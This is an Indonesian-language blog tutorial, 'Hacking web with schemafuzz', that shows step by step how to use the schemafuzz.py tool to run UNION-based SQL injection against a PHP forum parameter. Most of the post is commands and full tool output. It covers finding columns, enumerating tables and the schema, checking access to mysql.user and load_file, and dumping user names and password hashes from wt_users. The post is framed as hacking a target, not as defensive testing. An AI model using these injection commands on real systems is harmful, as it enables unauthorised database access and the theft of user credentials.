Hacking web with schemafuzz

langsung aja tutornya ya :D
siapkan alat dan bahan sebagai berikut :
1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3.CMD
4.Konsole (bagi pengguna linux)

bagi pengguna windust ikuti langkah berikut
buka menu CMD kemudian masuk kedalam directori Cdengan menggunakan perintah
cd c:\ enter
c:\>schemafuzz.py enter

Bagi pengguna linux tinggal mengetikkan di konsloe perintah berikut

./schemafuz.py enter

oke :)
setalah masuk ke direktory schemafuzz
tingal ikuti langkah selanjutnya

1.Cari target
Misal: http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.

caranya seperti ini ./schemafuzz.py -h help

kita temukan sebagian perintahnya seperti ini

–schema, –dbs, –dump, –fuzz, –info, –full, –findcol

langkah pertama

—————-

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1″ –findcol

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1–

[+] Evasion Used: “+” “–”

[+] 01:32:04

[+] Proxy Not Given

[+] Attempting To find the number of columns…

[+] Testing: 0,1,2,3,4,5,

[+] Column Length is: 6

[+] Found null column at column #: 1

[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5–

[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5

[-] Done!

langkah kedua

————–

setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –fuzz

diperoleh seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:37:09

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Number of tables names to be fuzzed: 354

[+] Number of column names to be fuzzed: 263

[+] Searching for tables and columns…

[+] Found a table called: mysql.user

[+] Now searching for columns inside table “mysql.user”

[!] Found a column called:user

[!] Found a column called:password

[-] Done searching inside table “mysql.user” for columns!

[-] [01:37:48]

[-] Total URL Requests 618

[-] Done

langkah ketiga

—————

Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D namadatabasenya

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:43:11

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Showing Tables & Columns from database “webthings”

[+] Number of Tables: 33

[Database]: webthings

[Table: Columns]

[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views

[1]wt_articles_title: article_id,category,title,active,date,userid,views

[2]wt_articlescat: cod,category

[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date

[4]wt_banners_log: banner,date,views,clicks,sessions

[5]wt_banners_rawlog: banner,type,date,session

[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box

[7]wt_comments: cod,type,link,date,userid,comment

[8]wt_config: id,config

[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,
author_name,author_email,comments,url_screenshot,license,license_text

[10]wt_downloadscat: cod,ref,name,descr

[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer

[12]wt_faq_topics: cod,name

[13]wt_forum_log_topics: uid,msgid,logtime,notifysent

[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies

[15]wt_forums: cod,title,descr,locked,notifies,register

[16]wt_forums_mod: forum,userid,type

[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst

[18]wt_links: id,category,active,name,url,count,descr,obs

[19]wt_linkscat: cod,name,descr,parent_id

[20]wt_menu: id,pos,title,url,type,newwindow,lang

[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,
full_text_ori,archived,sidebox,sideboxtitle,sideboxpos

[22]wt_newscat: cod,name,image

[23]wt_online: id,time,uid

[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks

[25]wt_picofdaycat: id,name,description

[26]wt_picofdaysel: date,picture_id,views,clicks

[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,
count01,count02,count03,count04,count05,count06,count07,count08,count09,count10

[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules

[29]wt_user_access: userid,module

[30]wt_user_book: userid,cod_user

[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify

[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,
city,state,icq,aim,sex,session,active,comments,

newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,
newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]

[-] Total URL Requests 270

[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u “http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5″ –info

maka akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–

[+] Evasion Used: “+” “–”

[+] 01:46:51

[+] Proxy Not Given

[+] Gathering MySQL Server Configuration…

Database: webthings

User: testing@localhost

Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <– w00t w00t [!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0×3a,password),2,3,4,5+FROM+mysql.user– [+] Do we have Access to Load_File: No [-] [01:46:51] [-] Total URL Requests 3 [-] Done ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" –dbs akan tampil seperti ini [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5– [+] Evasion Used: "+" "–" [+] 01:58:15 [+] Proxy Not Given [+] Gathering MySQL Server Configuration… Database: webthings User: testing@localhost Version: 5.0.51a [+] Showing all databases current user has access too! [+] Number of Databases: 1 [0] webthings [-] [01:58:17] [-] Total URL Requests 30 [-] Done langkah selanjutnya ——————– cara untuk menemukan user dan password kita gunakan perintah –dump -D namadatabase -T namatabel -C namakolom setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini ./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" –dump -D webthing -T wt_users -C name,password eing ing eng…. jreennnng….keluar deh user ama passwordnya hasilnya dibawah ini [+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5– [+] Evasion Used: "+" "–" [+] 02:08:47 [+] Proxy Not Given [+] Gathering MySQL Server Configuration… Database: webthings User: testing@localhost Version: 5.0.51a [+] Dumping data from database "webthings" Table "wt_users" [+] Column(s) ['name', 'password'] [+] Number of Rows: 2 [0] admin:e00b29d5b34c3f78df09d45921c9ec47: [1] user:098f6bcd4621d373cade4e832627b4f6: [-] [02:08:48] [-] Total URL Requests 4 [-] Done

No comments:

Post a Comment

Featured Posts